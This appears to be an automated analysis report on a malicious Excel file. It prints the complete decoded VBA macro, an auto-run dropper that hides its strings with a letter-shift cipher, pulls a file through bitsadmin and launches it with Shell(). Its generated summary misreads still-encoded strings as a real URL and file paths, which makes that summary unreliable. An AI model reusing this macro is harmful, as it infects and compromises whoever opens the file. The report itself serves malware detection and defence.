Office (OLE) malware analysis — malicious · bc2ed024c4b149af

MALICIOUS

Office (OLE)

72.0 KB Created: 2019-02-13 01:19:10 Authoring application: Microsoft Excel First seen: 2019-05-31

MD5: 0344a23c93084865460f01d227ce7a28 SHA-1: dd5fe05ba0510166093a913e79a8fe1e5bdfc475 SHA-256: bc2ed024c4b149afc57f6761a176679e465a093844706068fe47e334c6a2623b

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols

The sample contains a Workbook_Open VBA macro that uses obfuscated strings and calls the Shell() function to execute a payload. The macro attempts to download a file from 'http://www.picmonkey.com' and save it as 'a1.0\utbjwxmjqq.jcj' in either the user's Public directory or the System32 directory, then executes it. The obfuscation makes it difficult to determine the exact nature of the payload, but the presence of Shell() and the download attempt strongly indicate a dropper.

Heuristics 8

ClamAV: Doc.Dropper.Agent-6856424-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6856424-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://www.picmonkey.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2054 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2054 bytes
SHA-256: `4b3257f26fcbeaa7deb38f317d0c2078ee8383afd6ccd20a93f9e6692d92cfee`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Function dyjLmJ(fraVFh As String, LYbF As Integer) As String Dim sMWHgw As String Dim i As Integer Dim PUhIyUK As Integer Dim EiEO As Integer sMWHgw = fraVFh For i = 0 To Len(sMWHgw) - 1 PUhIyUK = Asc(Mid(fraVFh, i + 1, 1)) EiEO = Asc(Mid(fraVFh, i + 1, 1)) If PUhIyUK > 64 And PUhIyUK < 91 Then Mid(sMWHgw, i + 1, 1) = Chr(((EiEO + LYbF - 65) Mod 26) + 65) ElseIf PUhIyUK > 96 And PUhIyUK < 123 Then Mid(sMWHgw, i + 1, 1) = Chr(((EiEO + LYbF - 97) Mod 26) + 97) Else Mid(sMWHgw, i + 1, 1) = Mid(fraVFh, i + 1, 1) End If Next i dyjLmJ = sMWHgw End Function Private Sub Workbook_Open() Dim lnCOKDY As String lnCOKDY = dyjLmJ("ryjiqtcyd /jhqdivuh cozer /temdbeqt /fhyehyjo xywx xjjfi://wejqlydysq.fj/ekjfkj.unu ", 10) & Environ$(dyjLmJ("OddRoho", 12)) & dyjLmJ("\zfeafe.pip", 15) & vbCrLf & dyjLmJ("Efmdf-Bdaoqee '", 14) & Environ$(dyjLmJ("LaaOlel", 15)) & dyjLmJ("\ionjon.yry'", 6) Dim yxtlfB As Integer yxtlfB = FreeFile Open Environ$(dyjLmJ("OddRoho", 12)) & dyjLmJ("\IoMBKrX.ux1", 21) For Output As #yxtlfB Print #yxtlfB, lnCOKDY Close #yxtlfB RetVal = Shell(Environ$(dyjLmJ("DjdepxCzze", 15)) & dyjLmJ("\Xdxyjr32\BnsitbxUtbjwXmjqq\a1.0\utbjwxmjqq.jcj -JcjhzyntsUtqnhd Gdufxx ", 21) & Environ$(dyjLmJ("CrrFcvc", 24)) & dyjLmJ("\HnLAJqW.tw1", 22), 0) End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 4b3257f26fcbeaa7deb38f317d0c2078ee8383afd6ccd20a93f9e6692d92cfee

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Function dyjLmJ(fraVFh As String, LYbF As Integer) As String
    Dim sMWHgw As String
    Dim i As Integer
    Dim PUhIyUK As Integer
    Dim EiEO As Integer
    sMWHgw = fraVFh
    For i = 0 To Len(sMWHgw) - 1
        PUhIyUK = Asc(Mid(fraVFh, i + 1, 1))
        EiEO = Asc(Mid(fraVFh, i + 1, 1))
        If PUhIyUK > 64 And PUhIyUK < 91 Then
            Mid(sMWHgw, i + 1, 1) = Chr(((EiEO + LYbF - 65) Mod 26) + 65)
        ElseIf PUhIyUK > 96 And PUhIyUK < 123 Then
            Mid(sMWHgw, i + 1, 1) = Chr(((EiEO + LYbF - 97) Mod 26) + 97)
        Else
            Mid(sMWHgw, i + 1, 1) = Mid(fraVFh, i + 1, 1)
        End If
    Next i
    dyjLmJ = sMWHgw
End Function

Private Sub Workbook_Open()
    Dim lnCOKDY As String
    lnCOKDY = dyjLmJ("ryjiqtcyd /jhqdivuh cozer /temdbeqt /fhyehyjo xywx xjjfi://wejqlydysq.fj/ekjfkj.unu ", 10) & Environ$(dyjLmJ("OddRoho", 12)) & dyjLmJ("\zfeafe.pip", 15) & vbCrLf & dyjLmJ("Efmdf-Bdaoqee '", 14) & Environ$(dyjLmJ("LaaOlel", 15)) & dyjLmJ("\ionjon.yry'", 6)
    Dim yxtlfB As Integer
    yxtlfB = FreeFile
    Open Environ$(dyjLmJ("OddRoho", 12)) & dyjLmJ("\IoMBKrX.ux1", 21) For Output As #yxtlfB
    Print #yxtlfB, lnCOKDY
    Close #yxtlfB
    RetVal = Shell(Environ$(dyjLmJ("DjdepxCzze", 15)) & dyjLmJ("\Xdxyjr32\BnsitbxUtbjwXmjqq\a1.0\utbjwxmjqq.jcj -JcjhzyntsUtqnhd Gdufxx ", 21) & Environ$(dyjLmJ("CrrFcvc", 24)) & dyjLmJ("\HnLAJqW.tw1", 22), 0)
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.